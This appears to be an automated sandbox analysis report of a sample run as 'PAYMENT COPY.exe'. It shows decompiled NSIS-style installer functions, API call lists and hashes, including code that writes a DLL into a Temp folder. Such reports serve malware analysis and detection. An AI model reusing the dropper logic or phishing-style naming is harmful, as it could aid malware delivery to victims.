                                                                  • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                  • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 85%
                                                                  			E00402386(void* __eax, void* __eflags) {
                                                                  				void* _t15;
                                                                  				char* _t18;
                                                                  				int _t19;
                                                                  				char _t24;
                                                                  				int _t27;
                                                                  				intOrPtr _t33;
                                                                  				void* _t35;
                                                                  
                                                                  				_t15 = E00402B61(__eax);
                                                                  				_t33 =  *((intOrPtr*)(_t35 - 0x14));
                                                                  				 *(_t35 - 0x30) =  *(_t35 - 0x10);
                                                                  				 *(_t35 - 0x44) = E00402A9A(2);
                                                                  				_t18 = E00402A9A(0x11);
                                                                  				 *(_t35 - 4) = 1;
                                                                  				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
                                                                  				if(_t19 == 0) {
                                                                  					if(_t33 == 1) {
                                                                  						E00402A9A(0x23);
                                                                  						_t19 = lstrlenA(0x40a418) + 1;
                                                                  					}
                                                                  					if(_t33 == 4) {
                                                                  						_t24 = E00402A7D(3);
                                                                  						 *0x40a418 = _t24;
                                                                  						_t19 = _t33;
                                                                  					}
                                                                  					if(_t33 == 3) {
                                                                  						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
                                                                  					}
                                                                  					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
                                                                  						 *(_t35 - 4) = _t27;
                                                                  					}
                                                                  					_push( *(_t35 + 8));
                                                                  					RegCloseKey();
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
                                                                  				return 0;
                                                                  			}










                                                                  0x00402387
                                                                  0x0040238c
                                                                  0x00402396
                                                                  0x004023a0
                                                                  0x004023a3
                                                                  0x004023b5
                                                                  0x004023bc
                                                                  0x004023c4
                                                                  0x004023d2
                                                                  0x004023d6
                                                                  0x004023e1
                                                                  0x004023e1
                                                                  0x004023e5
                                                                  0x004023e9
                                                                  0x004023ef
                                                                  0x004023f4
                                                                  0x004023f4
                                                                  0x004023f8
                                                                  0x00402404
                                                                  0x00402404
                                                                  0x0040241d
                                                                  0x0040241f
                                                                  0x0040241f
                                                                  0x00402422
                                                                  0x004024fb
                                                                  0x004024fb
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                                  • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: CloseCreateValuelstrlen
                                                                  • String ID:
                                                                  • API String ID: 1356686001-0
                                                                  • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                  • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                                                  • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                  • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 85%
                                                                  			E00401F4B(char __ebx, char* __edi, char* __esi) {
                                                                  				char* _t21;
                                                                  				int _t22;
                                                                  				void* _t33;
                                                                  
                                                                  				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
                                                                  				_t21 = E00402A9A(0xffffffee);
                                                                  				 *(_t33 - 0x2c) = _t21;
                                                                  				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
                                                                  				 *__esi = __ebx;
                                                                  				 *(_t33 - 8) = _t22;
                                                                  				 *__edi = __ebx;
                                                                  				 *((intOrPtr*)(_t33 - 4)) = 1;
                                                                  				if(_t22 != __ebx) {
                                                                  					__eax = GlobalAlloc(0x40, __eax);
                                                                  					 *(__ebp - 0x34) = __eax;
                                                                  					if(__eax != __ebx) {
                                                                  						if(__eax != 0) {
                                                                  							__ebp - 0x44 = __ebp + 8;
                                                                  							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
                                                                  								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
                                                                  								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
                                                                  								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                  							}
                                                                  						}
                                                                  						_push( *(__ebp - 0x34));
                                                                  						GlobalFree();
                                                                  					}
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
                                                                  				return 0;
                                                                  			}






                                                                  0x00401f50
                                                                  0x00401f53
                                                                  0x00401f5b
                                                                  0x00401f60
                                                                  0x00401f65
                                                                  0x00401f69
                                                                  0x00401f6c
                                                                  0x00401f6e
                                                                  0x00401f75
                                                                  0x00401f7e
                                                                  0x00401f86
                                                                  0x00401f89
                                                                  0x00401f9e
                                                                  0x00401fa4
                                                                  0x00401fb7
                                                                  0x00401fc0
                                                                  0x00401fcc
                                                                  0x00401fd1
                                                                  0x00401fd1
                                                                  0x00401fb7
                                                                  0x00401fd4
                                                                  0x00401be1
                                                                  0x00401be1
                                                                  0x00401f89
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                                  • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                                  • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                                    • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                  • String ID:
                                                                  • API String ID: 1404258612-0
                                                                  • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                  • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                                                  • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                  • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 92%
                                                                  			E004021F6() {
                                                                  				void* __ebx;
                                                                  				char _t33;
                                                                  				CHAR* _t35;
                                                                  				CHAR* _t38;
                                                                  				void* _t40;
                                                                  
                                                                  				_t35 = E00402A9A(_t33);
                                                                  				 *(_t40 + 8) = _t35;
                                                                  				_t38 = E00402A9A(0x11);
                                                                  				 *(_t40 - 0x64) =  *(_t40 - 8);
                                                                  				 *((intOrPtr*)(_t40 - 0x60)) = 2;
                                                                  				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
                                                                  				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
                                                                  				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
                                                                  				lstrcatA(0x40a418, _t38);
                                                                  				 *(_t40 - 0x5c) =  *(_t40 + 8);
                                                                  				 *(_t40 - 0x58) = _t38;
                                                                  				 *(_t40 - 0x4a) = 0x40a418;
                                                                  				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
                                                                  				E00404D62(_t33, 0x40a418);
                                                                  				if(SHFileOperationA(_t40 - 0x64) != 0) {
                                                                  					E00404D62(0xfffffff9, _t33);
                                                                  					 *((intOrPtr*)(_t40 - 4)) = 1;
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
                                                                  				return 0;
                                                                  			}








                                                                  0x004021fc
                                                                  0x00402200
                                                                  0x00402208
                                                                  0x0040220e
                                                                  0x00402211
                                                                  0x0040221e
                                                                  0x0040222f
                                                                  0x00402233
                                                                  0x0040223a
                                                                  0x00402243
                                                                  0x0040224b
                                                                  0x0040224e
                                                                  0x00402251
                                                                  0x00402255
                                                                  0x00402266
                                                                  0x0040226f
                                                                  0x004026da
                                                                  0x004026da
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • lstrlenA.KERNEL32 ref: 00402218
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                                  • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                                                    • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                    • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                    • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                    • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                  • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                  • String ID:
                                                                  • API String ID: 3674637002-0
                                                                  • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                  • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                                                  • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                  • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040555F(CHAR* _a4) {
                                                                  				CHAR* _t3;
                                                                  				char* _t5;
                                                                  				CHAR* _t7;
                                                                  				CHAR* _t8;
                                                                  				void* _t10;
                                                                  
                                                                  				_t8 = _a4;
                                                                  				_t7 = CharNextA(_t8);
                                                                  				_t3 = CharNextA(_t7);
                                                                  				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                  					if( *_t8 != 0x5c5c) {
                                                                  						L8:
                                                                  						return 0;
                                                                  					}
                                                                  					_t10 = 2;
                                                                  					while(1) {
                                                                  						_t10 = _t10 - 1;
                                                                  						_t5 = E004054F7(_t3, 0x5c);
                                                                  						if( *_t5 == 0) {
                                                                  							goto L8;
                                                                  						}
                                                                  						_t3 = _t5 + 1;
                                                                  						if(_t10 != 0) {
                                                                  							continue;
                                                                  						}
                                                                  						return _t3;
                                                                  					}
                                                                  					goto L8;
                                                                  				} else {
                                                                  					return CharNextA(_t3);
                                                                  				}
                                                                  			}








                                                                  0x00405568
                                                                  0x0040556f
                                                                  0x00405572
                                                                  0x00405577
                                                                  0x0040558a
                                                                  0x004055a4
                                                                  0x00000000
                                                                  0x004055a4
                                                                  0x0040558e
                                                                  0x0040558f
                                                                  0x00405592
                                                                  0x00405593
                                                                  0x0040559b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040559d
                                                                  0x004055a0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004055a0
                                                                  0x00000000
                                                                  0x00405580
                                                                  0x00000000
                                                                  0x00405581

                                                                  APIs
                                                                  • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 0040556D
                                                                  • CharNextA.USER32(00000000), ref: 00405572
                                                                  • CharNextA.USER32(00000000), ref: 00405581
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 3213498283-3936084776
                                                                  • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                  • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                                                  • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                  • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 61%
                                                                  			E00401D8E() {
                                                                  				void* __esi;
                                                                  				int _t6;
                                                                  				signed char _t11;
                                                                  				struct HFONT__* _t14;
                                                                  				void* _t18;
                                                                  				void* _t24;
                                                                  				void* _t26;
                                                                  				void* _t28;
                                                                  
                                                                  				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                                  				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
                                                                  				 *0x4093e8 = E00402A7D(3);
                                                                  				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                  				 *0x4093ef = 1;
                                                                  				 *0x4093ec = _t11 & 0x00000001;
                                                                  				 *0x4093ed = _t11 & 0x00000002;
                                                                  				 *0x4093ee = _t11 & 0x00000004;
                                                                  				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
                                                                  				_t14 = CreateFontIndirectA(0x4093d8);
                                                                  				_push(_t14);
                                                                  				_push(_t26);
                                                                  				E0040591D();
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
                                                                  				return 0;
                                                                  			}











                                                                  0x00401d9c
                                                                  0x00401db5
                                                                  0x00401dbf
                                                                  0x00401dc4
                                                                  0x00401dcf
                                                                  0x00401dd6
                                                                  0x00401de8
                                                                  0x00401dee
                                                                  0x00401df3
                                                                  0x00401dfd
                                                                  0x00402536
                                                                  0x00401581
                                                                  0x004028d7
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401D95
                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                                  • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirect
                                                                  • String ID:
                                                                  • API String ID: 3272661963-0
                                                                  • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                  • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                                                  • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                  • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                  				int _t19;
                                                                  				long _t23;
                                                                  
                                                                  				if(_a8 != 0x102) {
                                                                  					__eflags = _a8 - 2;
                                                                  					if(_a8 == 2) {
                                                                  						 *0x40929c =  *0x40929c | 0xffffffff;
                                                                  						__eflags =  *0x40929c;
                                                                  					}
                                                                  					__eflags = _a8 - 0x200;
                                                                  					if(_a8 != 0x200) {
                                                                  						_t23 = _a16;
                                                                  						goto L9;
                                                                  					} else {
                                                                  						_t19 = IsWindowVisible(_a4);
                                                                  						__eflags = _t19;
                                                                  						if(_t19 == 0) {
                                                                  							L12:
                                                                  							_t23 = _a16;
                                                                  							L13:
                                                                  							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
                                                                  						}
                                                                  						_t23 = E00404627(_a4, 1);
                                                                  						_a8 = 0x419;
                                                                  						L9:
                                                                  						__eflags = _a8 - 0x419;
                                                                  						if(_a8 == 0x419) {
                                                                  							__eflags =  *0x40929c - _t23; // 0xffffffff
                                                                  							if(__eflags != 0) {
                                                                  								 *0x40929c = _t23;
                                                                  								E004059BF(0x79f580, 0x7a4000);
                                                                  								E0040591D(0x7a4000, _t23);
                                                                  								E00401410(6);
                                                                  								E004059BF(0x7a4000, 0x79f580);
                                                                  							}
                                                                  						}
                                                                  						goto L13;
                                                                  					}
                                                                  				}
                                                                  				if(_a12 == 0x20) {
                                                                  					E00403DF3(0x413);
                                                                  					return 0;
                                                                  				}
                                                                  				goto L12;
                                                                  			}





                                                                  0x00404cad
                                                                  0x00404cca
                                                                  0x00404cce
                                                                  0x00404cd0
                                                                  0x00404cd0
                                                                  0x00404cd0
                                                                  0x00404cd7
                                                                  0x00404ce3
                                                                  0x00404d03
                                                                  0x00000000
                                                                  0x00404ce5
                                                                  0x00404ce8
                                                                  0x00404cee
                                                                  0x00404cf0
                                                                  0x00404d43
                                                                  0x00404d43
                                                                  0x00404d46
                                                                  0x00000000
                                                                  0x00404d56
                                                                  0x00404cfc
                                                                  0x00404cfe
                                                                  0x00404d06
                                                                  0x00404d06
                                                                  0x00404d09
                                                                  0x00404d0b
                                                                  0x00404d11
                                                                  0x00404d20
                                                                  0x00404d26
                                                                  0x00404d2d
                                                                  0x00404d34
                                                                  0x00404d3b
                                                                  0x00404d40
                                                                  0x00404d11
                                                                  0x00000000
                                                                  0x00404d09
                                                                  0x00404ce3
                                                                  0x00404cb3
                                                                  0x00404cbe
                                                                  0x00000000
                                                                  0x00404cc3
                                                                  0x00000000

                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00404CE8
                                                                  • CallWindowProcA.USER32 ref: 00404D56
                                                                    • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                  • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                                                  • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                  • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                  				int _t5;
                                                                  				long _t7;
                                                                  				struct _OVERLAPPED* _t11;
                                                                  				intOrPtr* _t15;
                                                                  				void* _t17;
                                                                  				int _t21;
                                                                  
                                                                  				_t15 = __esi;
                                                                  				_t11 = __ebx;
                                                                  				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                  					_t7 = lstrlenA(E00402A9A(0x11));
                                                                  				} else {
                                                                  					E00402A7D(1);
                                                                  					 *0x40a018 = __al;
                                                                  				}
                                                                  				if( *_t15 == _t11) {
                                                                  					L8:
                                                                  					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                  				} else {
                                                                  					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll", _t7, _t17 + 8, _t11);
                                                                  					_t21 = _t5;
                                                                  					if(_t21 == 0) {
                                                                  						goto L8;
                                                                  					}
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
                                                                  				return 0;
                                                                  			}









                                                                  0x0040253c
                                                                  0x0040253c
                                                                  0x0040253f
                                                                  0x0040255a
                                                                  0x00402541
                                                                  0x00402543
                                                                  0x00402548
                                                                  0x0040254f
                                                                  0x00402561
                                                                  0x004026da
                                                                  0x004026da
                                                                  0x00402567
                                                                  0x00402579
                                                                  0x004015c8
                                                                  0x004015ca
                                                                  0x00000000
                                                                  0x004015d0
                                                                  0x004015ca
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll, xrefs: 00402548, 0040256D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: FileWritelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll
                                                                  • API String ID: 427699356-2113665744
                                                                  • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
